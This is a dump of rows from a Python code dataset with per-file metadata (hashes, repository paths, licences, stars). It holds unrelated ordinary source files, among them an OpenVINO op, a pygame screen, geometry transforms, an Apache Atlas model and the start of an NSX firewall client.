'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
| 41.75705 | 115 | 0.720883 | 0 | 0 | 357 | 0.018545 | 382 | 0.019844 | 18,832 | 0.978286 | 7,660 | 0.397922 |
9e930c5a58d02157e9d5c759c46110f181e09d5b | 85 | py | Python | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | [
"MIT"
]
| 1 | 2017-12-04T18:48:21.000Z | 2017-12-04T18:48:21.000Z | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | [
"MIT"
]
| null | null | null | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | [
"MIT"
]
| null | null | null | import colorama
from lxman.cli import cli
if __name__ == "__main__":
cli()
| 14.166667 | 27 | 0.658824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.117647 |
9e952388ffcae30ff69efaffb734ef8eaddfbd24 | 275 | py | Python | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | [
"MIT"
]
| null | null | null | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | [
"MIT"
]
| null | null | null | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | [
"MIT"
]
| null | null | null | ###########################################
# EXERCICIO 047 #
###########################################
'''CRIE UM PROGRAMA QUE MOSTRE NA TELA TODOS OS NUMEROS
PARES DE 1 E 50'''
for c in range(1, 51):
if c % 2 == 0:
print(c, end=' ') | 30.555556 | 55 | 0.341818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 206 | 0.749091 |
9e9894afbce14bcac12775c18c8be20d7bdde76f | 333 | py | Python | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | [
"MIT"
]
| null | null | null | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | [
"MIT"
]
| null | null | null | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | [
"MIT"
]
| null | null | null | def handle(automata, result):
"""
This is a simple handler
:param automata: the automata which yielded the result
:type automata: :class:`Automata`
:param result: the result of the automata
:type result: bool
"""
print(result)
if not result:
automata.switch("ask m: try again: f: handle")
| 27.75 | 58 | 0.645646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.705706 |
9e98a6268aa07a08ba6a43715f82f5d441844cbc | 2,090 | py | Python | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | [
"Apache-2.0"
]
| null | null | null | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | [
"Apache-2.0"
]
| 1 | 2021-09-09T08:43:57.000Z | 2021-09-10T12:39:16.000Z | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | [
"Apache-2.0"
]
| null | null | null | """
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from mo.graph.graph import Node, Graph
from mo.ops.op import Op
class Bucketize(Op):
op = 'Bucketize'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'kind': 'op',
'type': __class__.op,
'op': __class__.op,
'version': 'extension',
'type_infer': self.type_infer,
'infer': self.infer,
'in_ports_count': 2,
'out_ports_count': 1,
}
super().__init__(graph, mandatory_props, attrs)
def supported_attrs(self):
return ["with_right_bound"]
@staticmethod
def type_infer(node):
# the output is always integer since the layer outputs a bucket index
node.out_port(0).set_data_type(np.int32)
@staticmethod
def infer(node: Node):
assert node.with_right_bound is not None, \
"Attribute \"with_right_bound\" is not defined"
assert len(node.in_nodes()) == 2, \
"Incorrect number of inputs for {} node".format(node.id)
output_shape = node.in_port(0).data.get_shape()
node.out_port(0).data.set_shape(output_shape)
input_value = node.in_port(0).data.get_value()
buckets_value = node.in_port(1).data.get_value()
# compute if all input is constant
if input_value is not None and buckets_value is not None:
node.out_port(0).data.set_value(np.digitize(input_value, buckets_value, right=node.with_right_bound))
| 33.709677 | 113 | 0.661244 | 1,416 | 0.677512 | 0 | 0 | 878 | 0.420096 | 0 | 0 | 896 | 0.428708 |
9e9904613297e7bec0c0b0302bbc80565d246970 | 5,470 | py | Python | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | [
"MIT"
]
| 15 | 2016-12-11T14:30:30.000Z | 2019-12-15T13:26:57.000Z | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | [
"MIT"
]
| 10 | 2016-12-11T14:32:30.000Z | 2016-12-12T13:30:37.000Z | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | [
"MIT"
]
| 4 | 2016-12-11T14:30:37.000Z | 2021-03-13T12:46:20.000Z | import pygame
from app.view.animations import Delay, FadeIn, FadeOut, ChooseRandom, FrameAnimate, MovePosition, DelayCallBack, MoveValue, SequenceAnimation, ParallelAnimation, Timeout
from app.resources.event_handler import SET_GAME_STATE
from app.resources import text_renderer, colours
from app.resources.music import MusicManager
from app.resources.images import ImageManager
from app.conway.game_of_life import GameOfLife
from app.resources.event_handler import SOUND_EFFECT
class StateWinnersView:
def __init__(self, parent):
self.root = parent.parent
self.parent = parent
self.winners = self.root.winners
self.firework_size = 8
self.fireworks = GameOfLife(self.parent.resolution[0]//self.firework_size + 50,self.parent.resolution[1]//self.firework_size + 50)
self.root.event_handler.register_key_listener(self.handle_event)
self.congratulations_text = text_renderer.render_title("Champions", colours.COLOUR_WHITE)
self.team1_text = text_renderer.render_huge_text(self.winners[0].get_short_name(), colours.COLOUR_WHITE)
self.see_you = text_renderer.render_huge_text("Good Luck in the Finals!", colours.COLOUR_WHITE)
self.spawn_burst(self.fireworks.get_width()-65, 10)
self.spawn_burst(self.fireworks.get_width()-65, (self.fireworks.get_height()-65)//2-5)
self.spawn_burst(self.fireworks.get_width()-65, (self.fireworks.get_height()-65)//2+15)
self.spawn_burst(self.fireworks.get_width()-65, self.fireworks.get_height()-65)
self.spawn_burst(10, 10)
self.spawn_burst(10, (self.fireworks.get_height()-65)//2-5)
self.spawn_burst(10, (self.fireworks.get_height()-65)//2+15)
self.spawn_burst(10, self.fireworks.get_height()-65)
self.spawn_burst((self.fireworks.get_width()-65)//2 - 10, 10)
self.spawn_burst((self.fireworks.get_width()-65)//2 + 20, 10)
self.spawn_burst((self.fireworks.get_width()-65)//2 - 10, self.fireworks.get_height()-65)
self.spawn_burst((self.fireworks.get_width()-65)//2 + 20, self.fireworks.get_height()-65)
self.firework_animation = Timeout(self.update_fireworks, time=150)
self.animations = SequenceAnimation()
self.animations.add_animation(FadeIn(self.set_alpha, time=3000))
self.animations.add_animation(Delay( time=5000 ))
self.animations.add_animation(FadeOut(self.set_alpha, time=3000))
self.alpha = 0
self.frame = 0
def update_fireworks(self):
self.fireworks.update()
def set_alpha(self, alpha):
self.alpha = alpha
def spawn_burst(self, x, y):
self.fireworks.set_cell( x, y,1)
self.fireworks.set_cell(x+1, y,1)
self.fireworks.set_cell(x+2, y,1)
self.fireworks.set_cell(x+1, y+2,1)
self.fireworks.set_cell( x, y+4,1)
self.fireworks.set_cell(x+1,y+4,1)
self.fireworks.set_cell(x+2,y+4,1)
def render(self):
surface = pygame.Surface(self.parent.resolution)
for y in range(self.fireworks.get_height()):
for x in range(self.fireworks.get_width()):
node = self.fireworks.get_cell(x,y)
if node > 0:
pygame.draw.rect(surface, colours.COLOUR_YELLOW, (x*self.firework_size, y*self.firework_size, self.firework_size, self.firework_size))
surface.blit(self.congratulations_text,
((surface.get_width()-self.congratulations_text.get_width())/2,
surface.get_height()/2 - 150)
)
surface.blit(
self.team1_text,
((surface.get_width()-self.team1_text.get_width())/2,
(surface.get_height()-self.team1_text.get_height())/2)
)
mask = pygame.Surface(self.parent.resolution, pygame.SRCALPHA)
mask.fill((0,0,0, 255-self.alpha))
surface.blit(mask, (0,0))
return surface
def update(self, delta_t):
if self.animations.finished():
self.parent.trigger_exit_to_main()
self.animations.animate(delta_t)
self.firework_animation.animate(delta_t)
def handle_event(self, event):
if event.type == pygame.KEYDOWN:
if event.key in [pygame.K_ESCAPE]:
self.parent.trigger_exit_to_main()
def exit_state(self):
self.parent.parent.event_handler.unregister_key_listener(self.handle_event)
class AnnounceWinners:
def __init__(self, parent, state_seed='default'):
self.parent = parent
self.event_handler = parent.event_handler
self.resolution = self.parent.resolution
self.states = {
'default' : StateWinnersView
}
self.cur_state = state_seed
self.state = self.states[self.cur_state](self)
music_manager = MusicManager()
music_manager.restore_music_volume()
music_manager.play_song("champions", loops=-1)
def set_state(self, state):
self.state.exit_state()
self.state_code = state
self.state = self.states[state](self)
def render(self):
return self.state.render()
def update(self, delta_t):
self.state.update(delta_t)
def handle_event(self, event):
self.state.handle_event(event)
def trigger_exit_to_main(self):
self.state.exit_state()
event = pygame.event.Event(SET_GAME_STATE, state="main_menu", seed='intro')
pygame.event.post(event)
| 38.251748 | 169 | 0.668556 | 4,987 | 0.9117 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.015356 |
9e991333e11e3674737935eaa3ae326ec405ea15 | 7,259 | py | Python | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | [
"MIT"
]
| null | null | null | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | [
"MIT"
]
| null | null | null | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | [
"MIT"
]
| null | null | null | import numpy as np
import math
import functools as fu
import cv2
import random as rand
def transform_points(m, points):
""" It transforms the given point/points using the given transformation matrix.
:param points: numpy array, list
The point/points to be transformed given the transformation matrix.
:param m: An 3x3 matrix
The transformation matrix which will be used for the transformation.
:return: The transformed point/points.
"""
ph = make_homogeneous(points).T
ph = m @ ph
return make_euclidean(ph.T)
def transform_image(image, m):
""" It transforms the given image using the given transformation matrix.
:param img: An image
The image to be transformed given the transformation matrix.
:param m: An 3x3 matrix
The transformation matrix which will be used for the transformation.
:return: The transformed image.
"""
row, col, _ = image.shape
return cv2.warpPerspective(image, m, (col, row))
def make_homogeneous(points):
""" It converts the given point/points in an euclidean coordinates into a homogeneous coordinate
:param points: numpy array, list
The point/points to be converted into a homogeneous coordinate.
:return: The converted point/points in the homogeneous coordinates.
"""
if isinstance(points, list):
points = np.asarray([points], dtype=np.float64)
return np.hstack((points, np.ones((points.shape[0], 1), dtype=points.dtype)))
else:
return np.hstack((points, np.ones((points.shape[0], 1), dtype=points.dtype)))
def make_euclidean(points):
"""It converts the given point/points in a homogeneous coordinate into an euclidean coordinates.
:param points: numpy array, list
The point/points to be converted into an euclidean coordinates.
:return: The converted point/points in the euclidean coordinates.
"""
return points[:, :-1]
def identity():
""" It provides an identity transformation matrix.
:return: An identity matrix (3 x 3) using homogeneous coordinates.
"""
return np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
dtype=np.float64)
def rotating(θ=0):
""" It provides a rotation matrix given θ degrees which can then be used to rotate 2D point/points or an image
clockwise about the origin. If you want to rotate counterclockwise pass a negative degree.
:param θ: int
The amount of degree to be rotated. The default value is 0 which means when using it to rotate it won't rotate
the point/points or the image at all.
:returns: The rotation matrix (3 x 3) using homogeneous coordinates.
"""
θ = np.radians(θ)
cos = math.cos(θ)
sin = math.sin(θ)
return np.array([[cos, sin, 0],
[-sin, cos, 0],
[0, 0, 1]],
dtype=np.float64)
def translating(t_x=0, t_y=0):
""" It provides a translate matrix given quantity t_x and t_y for shifting x and y axes respectively.It can then
be used to translate or ”shift” a 2D point/points or an image.
as well as the y-axis by t_y.
:param t_x: int
The amount of shifting in the direction of the x-axis
:param t_y: int
The amount of shifting in the direction of the y-axis
The default values for both are 0. That is it does not translate the point/points or the image when applied.
:returns: The translation matrix (3 x 3) in homogeneous coordinates.
"""
return np.array([[1, 0, t_x],
[0, 1, t_y],
[0, 0, 1]],
dtype=np.float64)
def scaling(scale_x=1, scale_y=1):
""" It provides a scale matrix given quantity scale_x and scale_y for scaling x and y axes respectively.It can then
be used to scale a 2D point/points or an image.
scales (enlarge or shrink) the given 2D point/points in the direction of the x-axis by scale_x
as well as the y-axis by scale_x.
:param scale_x: int
The scale factor by which we wish to enlarge/shrink the point/points in the direction of the x-axis.
:param scale_y: int
The scale factor by which we wish to enlarge/shrink the point/points in the direction of the y-axis.
The default values for both are 1. That is it does not scale the point/points or the image when applied.
:return: The scaling matrix (3 x 3) in homogeneous coordinates.
"""
return np.array([[scale_x, 0, 0],
[0, scale_y, 0],
[0, 0, 1]],
dtype=np.float64)
def arbitrary():
"""
:return: An (3 x 3) arbitrary transformation matrix using translating, scaling and rotating function randomly.
"""
θ = rand.randint(-360, 361)
r = rotating(θ)
sx, sy = rand.sample(range(-10, 11), 2)
s = scaling(sx, sy)
tx, ty = rand.sample(range(-400, 401), 2)
t = translating(tx, ty)
I = identity()
if 0 <= tx <= 200:
return s @ t @ r @ I
else:
return r @ s @ I @ t
def invert(m):
""" It provides a matrix for performing the inversion.
:param m: a (3 x 3) matrix.
:return: The inverse of the given matrix.
"""
d = np.linalg.det(m)
if d != 0:
return np.linalg.inv(m).astype(dtype=np.float64)
else:
raise Exception("It is a non-invertible matrix")
def combine(*transformations):
""" It combines the given transformation matrices.
Be aware of which order you are passing the transformation matrices since it will be used to transform in that order.
:param transformations: (3 x 3) transformation matrices. As many as you want.
The matrices to be combined.
:return: The combined matrix (3 x 3).
"""
transformations = reversed(transformations)
return fu.reduce(lambda tr1, tr2: tr1 @ tr2, transformations)
def learn_affine(srs, tar):
""" It finds the affine transformation matrix between the two given triangles (3 points).
A x = b => x = inv(A) b
:param srs: three 2D points in homogeneous coordinates representing a triangle.
The source points.
:param tar: three 2D points in homogeneous coordinates representing a triangle.
The target pints.
:return: The affine transformation matrix.
"""
x1, x2, x3 = srs[0, 0], srs[1, 0], srs[2, 0]
y1, y2, y3 = srs[0, 1], srs[1, 1], srs[2, 1]
b = tar.flatten()
a = np.array([[x1, y1, 1, 0, 0, 0],
[0, 0, 0, x1, y1, 1],
[x2, y2, 1, 0, 0, 0],
[0, 0, 0, x2, y2, 1],
[x3, y3, 1, 0, 0, 0],
[0, 0, 0, x3, y3, 1]],
dtype=np.float64)
d = np.linalg.det(a)
if d != 0:
ai = np.linalg.inv(a)
x = ai @ b
x = x.flatten()
a1, a2, a3, a4 = x[0], x[1], x[3], x[4]
tx, ty = x[2], x[5]
aff_transformation = np.array([[a1, a2, tx],
[a3, a4, ty],
[0, 0, 1]],
dtype=np.float64)
return aff_transformation
else:
raise Exception("It is a non-invertible matrix") | 38.005236 | 121 | 0.609726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,267 | 0.586771 |
9e996e95c8e4d35efb2b156fddfb2e6b4af528f7 | 665 | py | Python | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | [
"MIT"
]
| 1 | 2021-10-04T07:45:18.000Z | 2021-10-04T07:45:18.000Z | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | [
"MIT"
]
| 1 | 2021-08-30T08:01:35.000Z | 2021-09-02T09:49:01.000Z | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | [
"MIT"
]
| null | null | null | #sys.argv[1] = bin_dir, sys.argv[2] = flye_info, sys.argv[3] = output_dir, sys.argv[3] = output_dir
import os, sys
bin_name=sys.argv[1]
bin_dir = sys.argv[2]
output_dir = sys.argv[3]
large_circular = []
flye_info = open(bin_dir + '/assembly_info.txt','r')
read_info = True
while read_info:
read_info = flye_info.readline()
entry = read_info.split('\t')
if len(entry) > 3:
if (entry[3] == "Y") and (int(entry[1]) > 2000000):
large_circular.append(entry[0])
for i in large_circular:
os.system('seqkit grep -n -p '+ i + ' ' + bin_dir + '/assembly.fasta -o ' +output_dir + '/' + bin_name + '_'+ i + '_unpolished_rf.fasta' )
| 25.576923 | 142 | 0.628571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.303759 |
9e99d0c79aa914a0737c4a26e98e840b98a19a4a | 322 | py | Python | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | [
"MIT"
]
| null | null | null | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | [
"MIT"
]
| null | null | null | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | [
"MIT"
]
| null | null | null | LOGGEDOUT_SCSS_MSG = "User Logged out successfully"
LOGIN_SCSS_MSG = "User Logged in successfully"
INVALID_PASS = "Passowrd not valid"
INVALID_USER = "User dose not exsists"
INVALID_SESSION = "Session Invalid"
INVALID_REQUEST = "Not a valid request"
BAD_REQUEST = "Bad request"
PASSWORD_EXPIERD = "Password Expierd" | 40.25 | 52 | 0.779503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 171 | 0.531056 |
9e9c6e139be0c60a12be6bd43fc6f12d8b899a15 | 1,611 | py | Python | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | [
"Apache-2.0"
]
| 4 | 2020-10-30T06:15:23.000Z | 2022-02-18T09:56:27.000Z | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | [
"Apache-2.0"
]
| null | null | null | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | [
"Apache-2.0"
]
| 4 | 2020-10-30T07:21:57.000Z | 2021-10-21T16:07:02.000Z | #!/usr/bin/env/python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import enum
class AtlasLineageInfo:
lineageDirection_enum = enum.Enum('lineageDirection_enum', 'INPUT OUTPUT BOTH', module=__name__)
def __init__(self, baseEntityGuid=None, lineageDirection=None, lineageDepth=None, guidEntityMap=None, relations=None):
self.baseEntityGuid = baseEntityGuid
self.lineageDirection = lineageDirection
self.lineageDepth = lineageDepth
self.guidEntityMap = guidEntityMap if guidEntityMap is not None else {}
self.relations = relations if relations is not None else set()
class LineageRelation:
def __init__(self, fromEntityId=None, toEntityId=None, relationshipId=None):
self.fromEntityId = fromEntityId
self.toEntityId = toEntityId
self.relationshipId = relationshipId | 41.307692 | 122 | 0.7455 | 783 | 0.486034 | 0 | 0 | 0 | 0 | 0 | 0 | 834 | 0.517691 |
9e9ef4bfbf0ebd4b0914ac2783452487117ef345 | 7,247 | py | Python | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | [
"MIT"
]
| 11 | 2015-07-08T01:28:01.000Z | 2022-01-26T14:29:47.000Z | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | [
"MIT"
]
| 5 | 2017-12-07T15:04:00.000Z | 2021-06-02T14:47:14.000Z | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | [
"MIT"
]
| 4 | 2017-02-18T18:20:13.000Z | 2022-03-23T16:21:20.000Z | #!/usr/bin/env python
# -*- coding: utf-8-unix -*-
"""
FOO = Register("A:4 B:4", 0x12)
BAR = Register("B:4 C:4", 0x23)
# evals as int which is a register address
print FOO == 0x12
# each field attribute returns a mask for that field
print FOO.B == 0b00001111
print BAR.B == 0b11110000
# ERROR: Register definition is readonly
FOO.B = 0b10101010
# creates register instance with initial value
foo = FOO(0xAC)
print foo.A == 0xA
print foo.B == 0xC
print foo == 0xAC
foo.B = 0
print foo == 0xA0
"""
import sys, os
from bitstring import Bits, BitArray
"""
Convert various typed values into BitArray value.
"""
def to_bits(val, bitlen):
if isinstance(val, str) or isinstance(val, bytearray):
return Bits(bytes=val, length=bitlen)
elif isinstance(val, Bits):
return Bits(bytes=val.bytes, length=bitlen)
elif isinstance(val, RegisterValue):
return Bits(bytes=val.value.bytes, length=bitlen)
return Bits(uint=val, length=bitlen)
"""
Installs filter function to limit access to non-existing attribute.
NOTE:
This replaces belonging class of passed object to dynamically
generated subclass of the original class.
"""
def protect_object(obj):
sub = type("Protected" + type(obj).__name__, (type(obj),), {})
fset = sub.__setattr__
def fset_wrap(self, key, val):
if not hasattr(self, key):
raise AttributeError("Access denied for key: %s" % key)
return fset(self, key, val)
sub.__setattr__ = fset_wrap
obj.__class__ = sub
"""
Generic class to wrap built-in types with custom attributes.
"""
class Value(object):
def __new__(cls, arg, **kw):
return type(cls.__name__, (type(arg), cls, ), kw)(arg)
class Field(Bits):
# NOTE:
# Subclassing bitstring.* is a pain, so I'll just workaround it
# by a factory method.
@classmethod
def create(cls, value, masklen, bitlen, offset):
field = Bits.__new__(cls, uint=value, length=masklen)
field.__offset = offset
field.__bitlen = bitlen
return field
@property
def offset(self):
return self.__offset
@property
def bitlen(self):
return self.__bitlen
class Register(int):
def __new__(cls, desc, address):
r_fields = []
r_bitlen = 0
# parse register description
for f in desc.split():
# expected: f in (":", "HOGE", "HOGE:123", ":123")
pair = f.split(":")
if len(pair) == 2:
f_name, f_bitlen = pair[0], int(pair[1]) if pair[1] else 1
else:
f_name, f_bitlen = pair[0], 1
r_fields.append((f_name, f_bitlen))
r_bitlen += f_bitlen
# returns bitmask implemented as readonly property
def makeprop(r_bitlen, f_bitlen, f_offset):
value = ((1 << f_bitlen) - 1) << f_offset
field = Field.create(value, r_bitlen, f_bitlen, f_offset)
return property(lambda x:field)
# generate property from register description
r_fields.reverse()
kw = {}
f_offset = 0
for f_name, f_bitlen in r_fields:
if len(f_name) > 0:
kw[f_name] = makeprop(r_bitlen, f_bitlen, f_offset)
f_offset += f_bitlen
r_fields.reverse()
# dynamically generate class for this register configuration
sub = type(cls.__name__, (cls, ), kw)
sub.__fields = [k for k,v in r_fields if k]
sub.__length = r_bitlen
obj = int.__new__(sub, address)
protect_object(obj)
return obj
@property
def fields(self):
return list(self.__fields)
@property
def length(self):
return self.__length
"""
Returns a new register instance with given initial value.
"""
def __call__(self, *args, **kwargs):
reg = RegisterValue(self, 0)
if args:
reg.value = args[0]
for k, v in kwargs.items():
setattr(reg, k, v)
return reg
class RegisterValue(object):
def __new__(cls, reg, value):
if cls is not RegisterValue:
return object.__new__(cls)
def makeprop(field):
def fget(self):
fval = (self.__value & field) >> field.offset
return Bits(uint=fval.uint, length=field.bitlen)
def fset(self, val):
curval = self.__value
newval = to_bits(val, curval.length) << field.offset
curval ^= field & curval
self.__value = curval | newval
self.__notify()
return property(fget, fset)
kw = {}
for f_name in reg.fields:
field = getattr(reg, f_name)
kw[f_name] = makeprop(field)
obj = type(cls.__name__, (cls, ), kw)(reg, value)
obj.__reg = reg
obj.__mon = {}
obj.value = value
protect_object(obj)
return obj
@property
def length(self):
return self.__reg.length
@property
def value(self):
return BitArray(bytes=self.__value.tobytes())
@value.setter
def value(self, value):
self.__value = to_bits(value, self.__reg.length)
self.__notify()
@property
def fields(self):
return self.__reg.fields
def subscribe(self, func):
self.__mon[func] = 1
def unsubscribe(self, func):
if self.__mon.has_key(func):
del self.__mon[func]
def __notify(self, *args, **kwargs):
for func in self.__mon.keys():
func(self, *args, **kwargs)
def __repr__(self):
rep = []
for f_name in self.fields:
field = getattr(self, f_name)
rep.append("{0}={1}".format(f_name, field))
return "(" + ", ".join(rep) + ")"
"""
Returns a new register value instance with the same initial value.
"""
def __call__(self, *args, **kwargs):
reg = RegisterValue(self.__reg, args[0] if args else self.value)
for k, v in kwargs.items():
setattr(reg, k, v)
return reg
def __and__(self, v):
return self.value & to_bits(v, self.length)
def __or__(self, v):
return self.value | to_bits(v, self.length)
def __xor__(self, v):
return self.value ^ to_bits(v, self.length)
def __nonzero__(self):
return self.value.uint
if __name__ == "__main__":
from IPython import embed
def handle_exception(atype, value, tb):
if hasattr(sys, 'ps1') or not sys.stderr.isatty():
# we are in interactive mode or we don't have a tty-like
# device, so we call the default hook
sys.__excepthook__(atype, value, tb)
else:
# we are NOT in interactive mode, print the exception...
import traceback
traceback.print_exception(atype, value, tb)
print
# ...then start the debugger in post-mortem mode.
from IPython import embed
embed()
sys.excepthook = handle_exception
REG = Register("FOO:3 :1 BAR:4", 0x12)
print(REG)
print(REG.FOO)
print(REG.BAR)
reg = REG(0xAC)
print(reg)
print(reg.FOO)
print(reg.BAR)
embed()
| 27.660305 | 74 | 0.588519 | 4,805 | 0.663033 | 0 | 0 | 792 | 0.109287 | 0 | 0 | 1,576 | 0.217469 |
9e9f1ba89714829bd8385e0bc2781953760fa2f6 | 83,916 | py | Python | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| 2 | 2020-10-20T16:09:25.000Z | 2020-12-16T23:35:55.000Z | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| null | null | null | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| 2 | 2020-12-16T23:35:56.000Z | 2021-02-04T07:00:08.000Z | #!/usr/bin/env python
# coding=utf-8
#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the X11 (MIT) (the “License”) set forth below;
#
# you may not use this file except in compliance with the License. Unless required by applicable law or agreed to in
# writing, software distributed under the License is distributed on an “AS IS” BASIS, without warranties or conditions
# of any kind, EITHER EXPRESS OR IMPLIED. See the License for the specific language governing permissions and
# limitations under the License. Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
#
# "THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.”
import argparse
import ConfigParser
from argparse import RawTextHelpFormatter
from tabulate import tabulate
from nsxramlclient.client import NsxClient
from pkg_resources import resource_filename
from libutils import dfw_rule_list_helper
from libutils import connect_to_vc
from libutils import nametovalue
__author__ = 'Emanuele Mazza'
def dfw_section_list(client_session):
"""
This function returns all the sections of the NSX distributed firewall
:param client_session: An instance of an NsxClient Session
:return returns
- for each of the three available sections types (L2, L3Redirect, L3) a list with item 0 containing the
section name as string, item 1 containing the section id as string, item 2 containing the section type
as a string
- a dictionary containing all sections' details, including dfw rules
"""
all_dfw_sections = client_session.read('dfwConfig')['body']['firewallConfiguration']
if str(all_dfw_sections['layer2Sections']) != 'None':
l2_dfw_sections = all_dfw_sections['layer2Sections']['section']
else:
l2_dfw_sections = list()
if str(all_dfw_sections['layer2Sections']) != 'None':
l3r_dfw_sections = all_dfw_sections['layer3RedirectSections']['section']
else:
l3r_dfw_sections = list()
if str(all_dfw_sections['layer3Sections']) != 'None':
l3_dfw_sections = all_dfw_sections['layer3Sections']['section']
else:
